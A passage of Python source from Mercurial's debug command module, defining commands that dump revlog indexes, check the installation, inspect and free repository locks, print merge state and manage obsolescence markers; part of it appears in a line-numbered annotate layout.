                ignorefile, lineno, line = ignoredata
                ui.write(_("(ignore rule in %s, line %d: '%s')\n")
                         % (ignorefile, lineno, line))
            else:
                ui.write(_("%s is not ignored\n") % m.uipath(f))

@command('debugindex', cmdutil.debugrevlogopts +
    [('f', 'format', 0, _('revlog format'), _('FORMAT'))],
    _('[-f FORMAT] -c|-m|FILE'),
    optionalrepo=True)
def debugindex(ui, repo, file_=None, **opts):
    """dump the contents of an index file"""
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugindex', file_, opts)
    format = opts.get('format', 0)
    if format not in (0, 1):
        raise error.Abort(_("unknown format %d") % format)

    generaldelta = r.version & revlog.FLAG_GENERALDELTA
    if generaldelta:
        basehdr = ' delta'
    else:
        basehdr = '  base'

    if ui.debugflag:
        shortfn = hex
    else:
        shortfn = short

    # There might not be anything in r, so have a sane default
    idlen = 12
    for i in r:
        idlen = len(shortfn(r.node(i)))
        break

    if format == 0:
        ui.write(("   rev    offset  length " + basehdr + " linkrev"
                  " %s %s p2\n") % ("nodeid".ljust(idlen), "p1".ljust(idlen)))
    elif format == 1:
        ui.write(("   rev flag   offset   length"
                  "     size " + basehdr + "   link     p1     p2"
                  " %s\n") % "nodeid".rjust(idlen))

    for i in r:
        node = r.node(i)
        if generaldelta:
            base = r.deltaparent(i)
        else:
            base = r.chainbase(i)
        if format == 0:
            try:
                pp = r.parents(node)
            except Exception:
                pp = [nullid, nullid]
            ui.write("% 6d % 9d % 7d % 6d % 7d %s %s %s\n" % (
                i, r.start(i), r.length(i), base, r.linkrev(i),
                shortfn(node), shortfn(pp[0]), shortfn(pp[1])))
        elif format == 1:
            pr = r.parentrevs(i)
            ui.write("% 6d %04x % 8d % 8d % 8d % 6d % 6d % 6d % 6d %s\n" % (
                i, r.flags(i), r.start(i), r.length(i), r.rawsize(i),
                base, r.linkrev(i), pr[0], pr[1], shortfn(node)))

@command('debugindexdot', cmdutil.debugrevlogopts,
    _('-c|-m|FILE'), optionalrepo=True)
def debugindexdot(ui, repo, file_=None, **opts):
    """dump an index DAG as a graphviz dot file"""
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugindexdot', file_, opts)
    ui.write(("digraph G {\n"))
    for i in r:
        node = r.node(i)
        pp = r.parents(node)
        ui.write("\t%d -> %d\n" % (r.rev(pp[0]), i))
        if pp[1] != nullid:
            ui.write("\t%d -> %d\n" % (r.rev(pp[1]), i))
    ui.write("}\n")

@command('debuginstall', [] + cmdutil.formatteropts, '', norepo=True)
def debuginstall(ui, **opts):
    '''test Mercurial installation

    Returns 0 on success.
    '''
    opts = pycompat.byteskwargs(opts)

    def writetemp(contents):
        (fd, name) = tempfile.mkstemp(prefix="hg-debuginstall-")
        f = os.fdopen(fd, r"wb")
        f.write(contents)
        f.close()
        return name

    problems = 0

    fm = ui.formatter('debuginstall', opts)
    fm.startitem()

    # encoding
    fm.write('encoding', _("checking encoding (%s)...\n"), encoding.encoding)
    err = None
    try:
        codecs.lookup(pycompat.sysstr(encoding.encoding))
    except LookupError as inst:
        err = util.forcebytestr(inst)
        problems += 1
    fm.condwrite(err, 'encodingerror', _(" %s\n"
                 " (check that your locale is properly set)\n"), err)

    # Python
    fm.write('pythonexe', _("checking Python executable (%s)\n"),
             pycompat.sysexecutable)
    fm.write('pythonver', _("checking Python version (%s)\n"),
             ("%d.%d.%d" % sys.version_info[:3]))
    fm.write('pythonlib', _("checking Python lib (%s)...\n"),
             os.path.dirname(pycompat.fsencode(os.__file__)))

    security = set(sslutil.supportedprotocols)
    if sslutil.hassni:
        security.add('sni')

    fm.write('pythonsecurity', _("checking Python security support (%s)\n"),
             fm.formatlist(sorted(security), name='protocol',
                           fmt='%s', sep=','))

    # These are warnings, not errors. So don't increment problem count. This
    # may change in the future.
    if 'tls1.2' not in security:
        fm.plain(_('  TLS 1.2 not supported by Python install; '
                   'network connections lack modern security\n'))
    if 'sni' not in security:
        fm.plain(_('  SNI not supported by Python install; may have '
                   'connectivity issues with some servers\n'))

    # TODO print CA cert info

    # hg version
    hgver = util.version()
    fm.write('hgver', _("checking Mercurial version (%s)\n"),
             hgver.split('+')[0])
    fm.write('hgverextra', _("checking Mercurial custom build (%s)\n"),
             '+'.join(hgver.split('+')[1:]))

    # compiled modules
    fm.write('hgmodulepolicy', _("checking module policy (%s)\n"),
             policy.policy)
    fm.write('hgmodules', _("checking installed modules (%s)...\n"),
             os.path.dirname(pycompat.fsencode(__file__)))

    if policy.policy in ('c', 'allow'):
        err = None
        try:
            from .cext import (
                base85,
                bdiff,
                mpatch,
                osutil,
            )
            dir(bdiff), dir(mpatch), dir(base85), dir(osutil)  # quiet pyflakes
        except Exception as inst:
            err = util.forcebytestr(inst)
            problems += 1
        fm.condwrite(err, 'extensionserror', " %s\n", err)

    compengines = util.compengines._engines.values()
    fm.write('compengines', _('checking registered compression engines (%s)\n'),
             fm.formatlist(sorted(e.name() for e in compengines),
                           name='compengine', fmt='%s', sep=', '))
    fm.write('compenginesavail', _('checking available compression engines '
                                   '(%s)\n'),
             fm.formatlist(sorted(e.name() for e in compengines
                                  if e.available()),
                           name='compengine', fmt='%s', sep=', '))
    wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
    fm.write('compenginesserver', _('checking available compression engines '
                                    'for wire protocol (%s)\n'),
             fm.formatlist([e.name() for e in wirecompengines
                            if e.wireprotosupport()],
                           name='compengine', fmt='%s', sep=', '))
    re2 = 'missing'
    if util._re2:
        re2 = 'available'
    fm.plain(_('checking "re2" regexp engine (%s)\n') % re2)
    fm.data(re2=bool(util._re2))

    # templates
    p = templater.templatepaths()
    fm.write('templatedirs', 'checking templates (%s)...\n', ' '.join(p))
    fm.condwrite(not p, '', _(" no template directories found\n"))
    if p:
        m = templater.templatepath("map-cmdline.default")
        if m:
            # template found, check if it is working
            err = None
            try:
                templater.templater.frommapfile(m)
            except Exception as inst:
                err = util.forcebytestr(inst)
                p = None
            fm.condwrite(err, 'defaulttemplateerror', " %s\n", err)
        else:
            p = None
        fm.condwrite(p, 'defaulttemplate',
                     _("checking default template (%s)\n"), m)
        fm.condwrite(not m, 'defaulttemplatenotfound',
                     _(" template '%s' not found\n"), "default")
    if not p:
        problems += 1
    fm.condwrite(not p, '',
                 _(" (templates seem to have been installed incorrectly)\n"))

    # editor
    editor = ui.geteditor()
    editor = util.expandpath(editor)
    editorbin = util.shellsplit(editor)[0]
    fm.write('editor', _("checking commit editor... (%s)\n"), editorbin)
    cmdpath = util.findexe(editorbin)
    fm.condwrite(not cmdpath and editor == 'vi', 'vinotfound',
                 _(" No commit editor set and can't find %s in PATH\n"
                   " (specify a commit editor in your configuration"
                   " file)\n"), not cmdpath and editor == 'vi' and editorbin)
    fm.condwrite(not cmdpath and editor != 'vi', 'editornotfound',
                 _(" Can't find editor '%s' in PATH\n"
                   " (specify a commit editor in your configuration"
                   " file)\n"), not cmdpath and editorbin)
    if not cmdpath and editor != 'vi':
        problems += 1

    # check username
    username = None
    err = None
    try:
        username = ui.username()
    except error.Abort as e:
        err = util.forcebytestr(e)
        problems += 1

    fm.condwrite(username, 'username', _("checking username (%s)\n"), username)
    fm.condwrite(err, 'usernameerror', _("checking username...\n %s\n"
        " (specify a username in your configuration file)\n"), err)

    fm.condwrite(not problems, '',
                 _("no problems detected\n"))
    if not problems:
        fm.data(problems=problems)
    fm.condwrite(problems, 'problems',
                 _("%d problems detected,"
                   " please check your install!\n"), problems)
    fm.end()

    return problems

@command('debugknown', [], _('REPO ID...'), norepo=True)
def debugknown(ui, repopath, *ids, **opts):
    """test whether node ids are known to a repo

    Every ID must be a full-length hex node id string. Returns a list of 0s
    and 1s indicating unknown/known.
    """
    opts = pycompat.byteskwargs(opts)
    repo = hg.peer(ui, opts, repopath)
    if not repo.capable('known'):
        raise error.Abort("known() not supported by target repository")
    flags = repo.known([bin(s) for s in ids])
    ui.write("%s\n" % ("".join([f and "1" or "0" for f in flags])))

@command('debuglabelcomplete', [], _('LABEL...'))
def debuglabelcomplete(ui, repo, *args):
    '''backwards compatibility with old bash completion scripts (DEPRECATED)'''
    debugnamecomplete(ui, repo, *args)

@command('debuglocks',
    [('L', 'force-lock', None, _('free the store lock (DANGEROUS)')),
     ('W', 'force-wlock', None,
      _('free the working state lock (DANGEROUS)')),
     ('s', 'set-lock', None, _('set the store lock until stopped')),
     ('S', 'set-wlock', None,
      _('set the working state lock until stopped'))],
    _('[OPTION]...'))
def debuglocks(ui, repo, **opts):
    """show or modify state of locks

    By default, this command will show which locks are held. This
    includes the user and process holding the lock, the amount of time
    the lock has been held, and the machine name where the process is
    running if it's not local.

    Locks protect the integrity of Mercurial's data, so should be
    treated with care. System crashes or other interruptions may cause
    locks to not be properly released, though Mercurial will usually
    detect and remove such stale locks automatically.

    However, detecting stale locks may not always be possible (for
    instance, on a shared filesystem). Removing locks may also be
    blocked by filesystem permissions.

    Setting a lock will prevent other commands from changing the data.
    The command will wait until an interruption (SIGINT, SIGTERM, ...) occurs.
    The set locks are removed when the command exits.

    Returns 0 if no locks are held.

    """

    if opts.get(r'force_lock'):
        repo.svfs.unlink('lock')
    if opts.get(r'force_wlock'):
        repo.vfs.unlink('wlock')
    if opts.get(r'force_lock') or opts.get(r'force_wlock'):
        return 0

    locks = []
    try:
        if opts.get(r'set_wlock'):
            try:
                locks.append(repo.wlock(False))
            except error.LockHeld:
                raise error.Abort(_('wlock is already held'))
        if opts.get(r'set_lock'):
            try:
                locks.append(repo.lock(False))
            except error.LockHeld:
                raise error.Abort(_('lock is already held'))
        if len(locks):
            ui.promptchoice(_("ready to release the lock (y)? $$ &Yes"))
            return 0
    finally:
        release(*locks)

    now = time.time()
    held = 0

    def report(vfs, name, method):
        # this causes stale locks to get reaped for more accurate reporting
        try:
            l = method(False)
        except error.LockHeld:
            l = None

        if l:
            l.release()
        else:
            try:
                st = vfs.lstat(name)
                age = now - st[stat.ST_MTIME]
                user = util.username(st.st_uid)
                locker = vfs.readlock(name)
                if ":" in locker:
                    host, pid = locker.split(':')
                    if host == socket.gethostname():
                        locker = 'user %s, process %s' % (user, pid)
                    else:
                        locker = 'user %s, process %s, host %s' \
                                 % (user, pid, host)
                ui.write(("%-6s %s (%ds)\n") % (name + ":", locker, age))
                return 1
            except OSError as e:
                if e.errno != errno.ENOENT:
                    raise

        ui.write(("%-6s free\n") % (name + ":"))
        return 0

    held += report(repo.svfs, "lock", repo.lock)
    held += report(repo.vfs, "wlock", repo.wlock)

    return held

@command('debugmergestate', [], '')
def debugmergestate(ui, repo, *args):
    """print merge state

    Use --verbose to print out information about whether v1 or v2 merge state
    was chosen."""
    def _hashornull(h):
        if h == nullhex:
            return 'null'
        else:
            return h

    def printrecords(version):
        ui.write(('* version %d records\n') % version)
        if version == 1:
            records = v1records
        else:
            records = v2records

        for rtype, record in records:
            # pretty print some record types
            if rtype == 'L':
                ui.write(('local: %s\n') % record)
            elif rtype == 'O':
                ui.write(('other: %s\n') % record)
            elif rtype == 'm':
                driver, mdstate = record.split('\0', 1)
                ui.write(('merge driver: %s (state "%s")\n')
                         % (driver, mdstate))
            elif rtype in 'FDC':
                r = record.split('\0')
                f, state, hash, lfile, afile, anode, ofile = r[0:7]
                if version == 1:
                    onode = 'not stored in v1 format'
                    flags = r[7]
                else:
                    onode, flags = r[7:9]
                ui.write(('file: %s (record type "%s", state "%s", hash %s)\n')
                         % (f, rtype, state, _hashornull(hash)))
                ui.write(('  local path: %s (flags "%s")\n') % (lfile, flags))
                ui.write(('  ancestor path: %s (node %s)\n')
                         % (afile, _hashornull(anode)))
                ui.write(('  other path: %s (node %s)\n')
                         % (ofile, _hashornull(onode)))
            elif rtype == 'f':
                filename, rawextras = record.split('\0', 1)
                extras = rawextras.split('\0')
                i = 0
                extrastrings = []
                while i < len(extras):
                    extrastrings.append('%s = %s' % (extras[i], extras[i + 1]))
                    i += 2

                ui.write(('file extras: %s (%s)\n')
                         % (filename, ', '.join(extrastrings)))
            elif rtype == 'l':
                labels = record.split('\0', 2)
                labels = [l for l in labels if len(l) > 0]
                ui.write(('labels:\n'))
                ui.write(('  local: %s\n' % labels[0]))
                ui.write(('  other: %s\n' % labels[1]))
                if len(labels) > 2:
                    ui.write(('  base: %s\n' % labels[2]))
            else:
                ui.write(('unrecognized entry: %s\t%s\n')
                         % (rtype, record.replace('\0', '\t')))

    # Avoid mergestate.read() since it may raise an exception for unsupported
    # merge state records. We shouldn't be doing this, but this is OK since this
    # command is pretty low-level.
    ms = mergemod.mergestate(repo)

    # sort so that reasonable information is on top
    v1records = ms._readrecordsv1()
    v2records = ms._readrecordsv2()
    order = 'LOml'
    def key(r):
        idx = order.find(r[0])
        if idx == -1:
            return (1, r[1])
        else:
            return (0, idx)
    v1records.sort(key=key)
    v2records.sort(key=key)

    if not v1records and not v2records:
        ui.write(('no merge state found\n'))
    elif not v2records:
        ui.note(('no version 2 merge state\n'))
        printrecords(1)
    elif ms._v1v2match(v1records, v2records):
        ui.note(('v1 and v2 states match: using v2\n'))
        printrecords(2)
    else:
        ui.note(('v1 and v2 states mismatch: using v1\n'))
        printrecords(1)
        if ui.verbose:
            printrecords(2)

@command('debugnamecomplete', [], _('NAME...'))
def debugnamecomplete(ui, repo, *args):
    '''complete "names" - tags, open branch names, bookmark names'''

    names = set()
    # since we previously only listed open branches, we will handle that
    # specially (after this for loop)
    for name, ns in repo.names.iteritems():
        if name != 'branches':
            names.update(ns.listnames(repo))
    names.update(tag for (tag, heads, tip, closed)
                 in repo.branchmap().iterbranches() if not closed)
    completions = set()
    if not args:
        args = ['']
    for a in args:
        completions.update(n for n in names if n.startswith(a))
    ui.write('\n'.join(sorted(completions)))
    ui.write('\n')

@command('debugobsolete',
    [('', 'flags', 0, _('markers flag')),
     ('', 'record-parents', False,
      _('record parent information for the precursor')),
     ('r', 'rev', [], _('display markers relevant to REV')),
     ('', 'exclusive', False, _('restrict display to markers only '
                                'relevant to REV')),
     ('', 'index', False, _('display index of the marker')),
     ('', 'delete', [], _('delete markers specified by indices')),
    ] + cmdutil.commitopts2 + cmdutil.formatteropts,
    _('[OBSOLETED [REPLACEMENT ...]]'))
def debugobsolete(ui, repo, precursor=None, *successors, **opts):
    """create arbitrary obsolete marker

    With no arguments, displays the list of obsolescence markers."""
1541 1541
1542 1542 opts = pycompat.byteskwargs(opts)
1543 1543
1544 1544 def parsenodeid(s):
1545 1545 try:
1546 1546 # We do not use revsingle/revrange functions here to accept
1547 1547 # arbitrary node identifiers, possibly not present in the
1548 1548 # local repository.
1549 1549 n = bin(s)
1550 1550 if len(n) != len(nullid):
1551 1551 raise TypeError()
1552 1552 return n
1553 1553 except TypeError:
1554 1554 raise error.Abort('changeset references must be full hexadecimal '
1555 1555 'node identifiers')
1556 1556
1557 1557 if opts.get('delete'):
1558 1558 indices = []
1559 1559 for v in opts.get('delete'):
1560 1560 try:
1561 1561 indices.append(int(v))
1562 1562 except ValueError:
1563 1563 raise error.Abort(_('invalid index value: %r') % v,
1564 1564 hint=_('use integers for indices'))
1565 1565
1566 1566 if repo.currenttransaction():
1567 1567 raise error.Abort(_('cannot delete obsmarkers in the middle '
1568 1568 'of a transaction.'))
1569 1569
1570 1570 with repo.lock():
1571 1571 n = repair.deleteobsmarkers(repo.obsstore, indices)
1572 1572 ui.write(_('deleted %i obsolescence markers\n') % n)
1573 1573
1574 1574 return
1575 1575
1576 1576 if precursor is not None:
1577 1577 if opts['rev']:
1578 1578 raise error.Abort('cannot select revision when creating marker')
1579 1579 metadata = {}
1580 1580 metadata['user'] = opts['user'] or ui.username()
1581 1581 succs = tuple(parsenodeid(succ) for succ in successors)
1582 1582 l = repo.lock()
1583 1583 try:
1584 1584 tr = repo.transaction('debugobsolete')
1585 1585 try:
1586 1586 date = opts.get('date')
1587 1587 if date:
1588 1588 date = dateutil.parsedate(date)
1589 1589 else:
1590 1590 date = None
1591 1591 prec = parsenodeid(precursor)
1592 1592 parents = None
1593 1593 if opts['record_parents']:
1594 1594 if prec not in repo.unfiltered():
1595 1595 raise error.Abort('cannot use --record-parents on '
1596 1596 'unknown changesets')
1597 1597 parents = repo.unfiltered()[prec].parents()
1598 1598 parents = tuple(p.node() for p in parents)
1599 1599 repo.obsstore.create(tr, prec, succs, opts['flags'],
1600 1600 parents=parents, date=date,
1601 1601 metadata=metadata, ui=ui)
1602 1602 tr.close()
1603 1603 except ValueError as exc:
1604 1604 raise error.Abort(_('bad obsmarker input: %s') %
1605 1605 pycompat.bytestr(exc))
1606 1606 finally:
1607 1607 tr.release()
1608 1608 finally:
1609 1609 l.release()
1610 1610 else:
1611 1611 if opts['rev']:
1612 1612 revs = scmutil.revrange(repo, opts['rev'])
1613 1613 nodes = [repo[r].node() for r in revs]
1614 1614 markers = list(obsutil.getmarkers(repo, nodes=nodes,
1615 1615 exclusive=opts['exclusive']))
1616 1616 markers.sort(key=lambda x: x._data)
1617 1617 else:
1618 1618 markers = obsutil.getmarkers(repo)
1619 1619
1620 1620 markerstoiter = markers
1621 1621 isrelevant = lambda m: True
1622 1622 if opts.get('rev') and opts.get('index'):
1623 1623 markerstoiter = obsutil.getmarkers(repo)
1624 1624 markerset = set(markers)
1625 1625 isrelevant = lambda m: m in markerset
1626 1626
1627 1627 fm = ui.formatter('debugobsolete', opts)
1628 1628 for i, m in enumerate(markerstoiter):
1629 1629 if not isrelevant(m):
1630 1630 # marker can be irrelevant when we're iterating over a set
1631 1631 # of markers (markerstoiter) which is bigger than the set
1632 1632 # of markers we want to display (markers)
1633 1633 # this can happen if both --index and --rev options are
1634 1634 # provided and thus we need to iterate over all of the markers
1635 1635 # to get the correct indices, but only display the ones that
1636 1636 # are relevant to --rev value
1637 1637 continue
1638 1638 fm.startitem()
1639 1639 ind = i if opts.get('index') else None
1640 1640 cmdutil.showmarker(fm, m, index=ind)
1641 1641 fm.end()
1642 1642
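# Illustrative usage of debugobsolete: passing two full 40-digit node
# ids records a marker obsoleting the first changeset in favor of the
# second; `hg debugobsolete --index` lists existing markers together
# with the indices that --delete accepts.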
1643 1643 @command('debugpathcomplete',
1644 1644 [('f', 'full', None, _('complete an entire path')),
1645 1645 ('n', 'normal', None, _('show only normal files')),
1646 1646 ('a', 'added', None, _('show only added files')),
1647 1647 ('r', 'removed', None, _('show only removed files'))],
1648 1648 _('FILESPEC...'))
1649 1649 def debugpathcomplete(ui, repo, *specs, **opts):
1650 1650 '''complete part or all of a tracked path
1651 1651
1652 1652 This command supports shells that offer path name completion. It
1653 1653 currently completes only files already known to the dirstate.
1654 1654
1655 1655 Completion extends only to the next path segment unless
1656 1656 --full is specified, in which case entire paths are used.'''
1657 1657
1658 1658 def complete(path, acceptable):
1659 1659 dirstate = repo.dirstate
1660 1660 spec = os.path.normpath(os.path.join(pycompat.getcwd(), path))
1661 1661 rootdir = repo.root + pycompat.ossep
1662 1662 if spec != repo.root and not spec.startswith(rootdir):
1663 1663 return [], []
1664 1664 if os.path.isdir(spec):
1665 1665 spec += '/'
1666 1666 spec = spec[len(rootdir):]
1667 1667 fixpaths = pycompat.ossep != '/'
1668 1668 if fixpaths:
1669 1669 spec = spec.replace(pycompat.ossep, '/')
1670 1670 speclen = len(spec)
1671 1671 fullpaths = opts[r'full']
1672 1672 files, dirs = set(), set()
1673 1673 adddir, addfile = dirs.add, files.add
1674 1674 for f, st in dirstate.iteritems():
1675 1675 if f.startswith(spec) and st[0] in acceptable:
1676 1676 if fixpaths:
1677 1677 f = f.replace('/', pycompat.ossep)
1678 1678 if fullpaths:
1679 1679 addfile(f)
1680 1680 continue
1681 1681 s = f.find(pycompat.ossep, speclen)
1682 1682 if s >= 0:
1683 1683 adddir(f[:s])
1684 1684 else:
1685 1685 addfile(f)
1686 1686 return files, dirs
1687 1687
1688 1688 acceptable = ''
1689 1689 if opts[r'normal']:
1690 1690 acceptable += 'nm'
1691 1691 if opts[r'added']:
1692 1692 acceptable += 'a'
1693 1693 if opts[r'removed']:
1694 1694 acceptable += 'r'
1695 1695 cwd = repo.getcwd()
1696 1696 if not specs:
1697 1697 specs = ['.']
1698 1698
1699 1699 files, dirs = set(), set()
1700 1700 for spec in specs:
1701 1701 f, d = complete(spec, acceptable or 'nmar')
1702 1702 files.update(f)
1703 1703 dirs.update(d)
1704 1704 files.update(dirs)
1705 1705 ui.write('\n'.join(repo.pathto(p, cwd) for p in sorted(files)))
1706 1706 ui.write('\n')
1707 1707
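# Illustrative sketch of the completion rule above: with dirstate entries
# 'src/a.py' and 'src/b/c.py', completing 'src/' without --full offers
# the file 'src/a.py' and the directory 'src/b', because matching stops
# at the next path separator:
#
#   spec = 'src/'
#   f = 'src/b/c.py'
#   f.find('/', len(spec))   # -> 5, so f[:5] == 'src/b' is added as a dir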
1708 1708 @command('debugpeer', [], _('PATH'), norepo=True)
1709 1709 def debugpeer(ui, path):
1710 1710 """establish a connection to a peer repository"""
1711 1711 # Always enable peer request logging. Requires --debug to display
1712 1712 # though.
1713 1713 overrides = {
1714 1714 ('devel', 'debug.peer-request'): True,
1715 1715 }
1716 1716
1717 1717 with ui.configoverride(overrides):
1718 1718 peer = hg.peer(ui, {}, path)
1719 1719
1720 1720 local = peer.local() is not None
1721 1721 canpush = peer.canpush()
1722 1722
1723 1723 ui.write(_('url: %s\n') % peer.url())
1724 1724 ui.write(_('local: %s\n') % (_('yes') if local else _('no')))
1725 1725 ui.write(_('pushable: %s\n') % (_('yes') if canpush else _('no')))
1726 1726
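# Illustrative output of debugpeer (the path is hypothetical):
#
#   $ hg debugpeer /path/to/repo
#   url: /path/to/repo
#   local: yes
#   pushable: yes
#
# A remote HTTP or SSH URL would report "local: no" instead.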
1727 1727 @command('debugpickmergetool',
1728 1728 [('r', 'rev', '', _('check for files in this revision'), _('REV')),
1729 1729 ('', 'changedelete', None, _('emulate merging change and delete')),
1730 1730 ] + cmdutil.walkopts + cmdutil.mergetoolopts,
1731 1731 _('[PATTERN]...'),
1732 1732 inferrepo=True)
1733 1733 def debugpickmergetool(ui, repo, *pats, **opts):
1734 1734 """examine which merge tool is chosen for specified file
1735 1735
1736 1736 As described in :hg:`help merge-tools`, Mercurial examines
1737 1737 the configurations below, in this order, to decide which merge
1738 1738 tool is chosen for the specified file.
1739 1739
1740 1740 1. ``--tool`` option
1741 1741 2. ``HGMERGE`` environment variable
1742 1742 3. configurations in ``merge-patterns`` section
1743 1743 4. configuration of ``ui.merge``
1744 1744 5. configurations in ``merge-tools`` section
1745 1745 6. ``hgmerge`` tool (for historical reasons only)
1746 1746 7. default tool for fallback (``:merge`` or ``:prompt``)
1747 1747
1748 1748 This command writes out the examination result in the style below::
1749 1749
1750 1750 FILE = MERGETOOL
1751 1751
1752 1752 By default, all files known in the first parent context of the
1753 1753 working directory are examined. Use file patterns and/or -I/-X
1754 1754 options to limit target files. -r/--rev is also useful to examine
1755 1755 files in another context without actually updating to it.
1756 1756
1757 1757 With --debug, this command also shows warning messages emitted
1758 1758 while matching against ``merge-patterns`` and so on. It is
1759 1759 recommended to use this option with explicit file patterns and/or
1760 1760 -I/-X options, because it increases the amount of output per file
1761 1761 according to the configurations in hgrc.
1762 1762
1763 1763 With -v/--verbose, this command first shows the configurations
1764 1764 below (only those that are actually specified).
1765 1765
1766 1766 - ``--tool`` option
1767 1767 - ``HGMERGE`` environment variable
1768 1768 - configuration of ``ui.merge``
1769 1769
1770 1770 If a merge tool is chosen before matching against
1771 1771 ``merge-patterns``, this command can't show any helpful
1772 1772 information, even with --debug. In such a case, the information
1773 1773 above is useful for understanding why a merge tool was chosen.
1774 1774 """
1775 1775 opts = pycompat.byteskwargs(opts)
1776 1776 overrides = {}
1777 1777 if opts['tool']:
1778 1778 overrides[('ui', 'forcemerge')] = opts['tool']
1779 1779 ui.note(('with --tool %r\n') % (pycompat.bytestr(opts['tool'])))
1780 1780
1781 1781 with ui.configoverride(overrides, 'debugmergepatterns'):
1782 1782 hgmerge = encoding.environ.get("HGMERGE")
1783 1783 if hgmerge is not None:
1784 1784 ui.note(('with HGMERGE=%r\n') % (pycompat.bytestr(hgmerge)))
1785 1785 uimerge = ui.config("ui", "merge")
1786 1786 if uimerge:
1787 1787 ui.note(('with ui.merge=%r\n') % (pycompat.bytestr(uimerge)))
1788 1788
1789 1789 ctx = scmutil.revsingle(repo, opts.get('rev'))
1790 1790 m = scmutil.match(ctx, pats, opts)
1791 1791 changedelete = opts['changedelete']
1792 1792 for path in ctx.walk(m):
1793 1793 fctx = ctx[path]
1794 1794 try:
1795 1795 if not ui.debugflag:
1796 1796 ui.pushbuffer(error=True)
1797 1797 tool, toolpath = filemerge._picktool(repo, ui, path,
1798 1798 fctx.isbinary(),
1799 1799 'l' in fctx.flags(),
1800 1800 changedelete)
1801 1801 finally:
1802 1802 if not ui.debugflag:
1803 1803 ui.popbuffer()
1804 1804 ui.write(('%s = %s\n') % (path, tool))
1805 1805
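# Illustrative output in the FILE = MERGETOOL style described above,
# assuming ui.merge is set to the internal ":merge" tool:
#
#   $ hg debugpickmergetool
#   file.txt = :merge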
1806 1806 @command('debugpushkey', [], _('REPO NAMESPACE [KEY OLD NEW]'), norepo=True)
1807 1807 def debugpushkey(ui, repopath, namespace, *keyinfo, **opts):
1808 1808 '''access the pushkey key/value protocol
1809 1809
1810 1810 With two args, list the keys in the given namespace.
1811 1811
1812 1812 With five args, set a key to new if it currently is set to old.
1813 1813 Reports success or failure.
1814 1814 '''
1815 1815
1816 1816 target = hg.peer(ui, {}, repopath)
1817 1817 if keyinfo:
1818 1818 key, old, new = keyinfo
1819 1819 r = target.pushkey(namespace, key, old, new)
1820 1820 ui.status(pycompat.bytestr(r) + '\n')
1821 1821 return not r
1822 1822 else:
1823 1823 for k, v in sorted(target.listkeys(namespace).iteritems()):
1824 1824 ui.write("%s\t%s\n" % (util.escapestr(k),
1825 1825 util.escapestr(v)))
1826 1826
1827 1827 @command('debugpvec', [], _('A B'))
1828 1828 def debugpvec(ui, repo, a, b=None):
1829 1829 ca = scmutil.revsingle(repo, a)
1830 1830 cb = scmutil.revsingle(repo, b)
1831 1831 pa = pvec.ctxpvec(ca)
1832 1832 pb = pvec.ctxpvec(cb)
1833 1833 if pa == pb:
1834 1834 rel = "="
1835 1835 elif pa > pb:
1836 1836 rel = ">"
1837 1837 elif pa < pb:
1838 1838 rel = "<"
1839 1839 elif pa | pb:
1840 1840 rel = "|"
1841 1841 ui.write(_("a: %s\n") % pa)
1842 1842 ui.write(_("b: %s\n") % pb)
1843 1843 ui.write(_("depth(a): %d depth(b): %d\n") % (pa._depth, pb._depth))
1844 1844 ui.write(_("delta: %d hdist: %d distance: %d relation: %s\n") %
1845 1845 (abs(pa._depth - pb._depth), pvec._hamming(pa._vec, pb._vec),
1846 1846 pa.distance(pb), rel))
1847 1847
1848 1848 @command('debugrebuilddirstate|debugrebuildstate',
1849 1849 [('r', 'rev', '', _('revision to rebuild to'), _('REV')),
1850 1850 ('', 'minimal', None, _('only rebuild files that are inconsistent with '
1851 1851 'the working copy parent')),
1852 1852 ],
1853 1853 _('[-r REV]'))
1854 1854 def debugrebuilddirstate(ui, repo, rev, **opts):
1855 1855 """rebuild the dirstate as it would look like for the given revision
1856 1856
1857 1857 If no revision is specified, the first parent of the working directory will be used.
1858 1858
1859 1859 The dirstate will be set to the files of the given revision.
1860 1860 The actual working directory content or existing dirstate
1861 1861 information such as adds or removes is not considered.
1862 1862
1863 1863 ``minimal`` will only rebuild the dirstate status for files that claim to be
1864 1864 tracked but are not in the parent manifest, or that exist in the parent
1865 1865 manifest but are not in the dirstate. It will not change adds, removes, or
1866 1866 modified files that are in the working copy parent.
1867 1867
1868 1868 One use of this command is to make the next :hg:`status` invocation
1869 1869 check the actual file content.
1870 1870 """
1871 1871 ctx = scmutil.revsingle(repo, rev)
1872 1872 with repo.wlock():
1873 1873 dirstate = repo.dirstate
1874 1874 changedfiles = None
1875 1875 # See command doc for what minimal does.
1876 1876 if opts.get(r'minimal'):
1877 1877 manifestfiles = set(ctx.manifest().keys())
1878 1878 dirstatefiles = set(dirstate)
1879 1879 manifestonly = manifestfiles - dirstatefiles
1880 1880 dsonly = dirstatefiles - manifestfiles
1881 1881 dsnotadded = set(f for f in dsonly if dirstate[f] != 'a')
1882 1882 changedfiles = manifestonly | dsnotadded
1883 1883
1884 1884 dirstate.rebuild(ctx.node(), ctx.manifest(), changedfiles)
1885 1885
1886 1886 @command('debugrebuildfncache', [], '')
1887 1887 def debugrebuildfncache(ui, repo):
1888 1888 """rebuild the fncache file"""
1889 1889 repair.rebuildfncache(ui, repo)
1890 1890
1891 1891 @command('debugrename',
1892 1892 [('r', 'rev', '', _('revision to debug'), _('REV'))],
1893 1893 _('[-r REV] FILE'))
1894 1894 def debugrename(ui, repo, file1, *pats, **opts):
1895 1895 """dump rename information"""
1896 1896
1897 1897 opts = pycompat.byteskwargs(opts)
1898 1898 ctx = scmutil.revsingle(repo, opts.get('rev'))
1899 1899 m = scmutil.match(ctx, (file1,) + pats, opts)
1900 1900 for abs in ctx.walk(m):
1901 1901 fctx = ctx[abs]
1902 1902 o = fctx.filelog().renamed(fctx.filenode())
1903 1903 rel = m.rel(abs)
1904 1904 if o:
1905 1905 ui.write(_("%s renamed from %s:%s\n") % (rel, o[0], hex(o[1])))
1906 1906 else:
1907 1907 ui.write(_("%s not renamed\n") % rel)
1908 1908
1909 1909 @command('debugrevlog', cmdutil.debugrevlogopts +
1910 1910 [('d', 'dump', False, _('dump index data'))],
1911 1911 _('-c|-m|FILE'),
1912 1912 optionalrepo=True)
1913 1913 def debugrevlog(ui, repo, file_=None, **opts):
1914 1914 """show data and statistics about a revlog"""
1915 1915 opts = pycompat.byteskwargs(opts)
1916 1916 r = cmdutil.openrevlog(repo, 'debugrevlog', file_, opts)
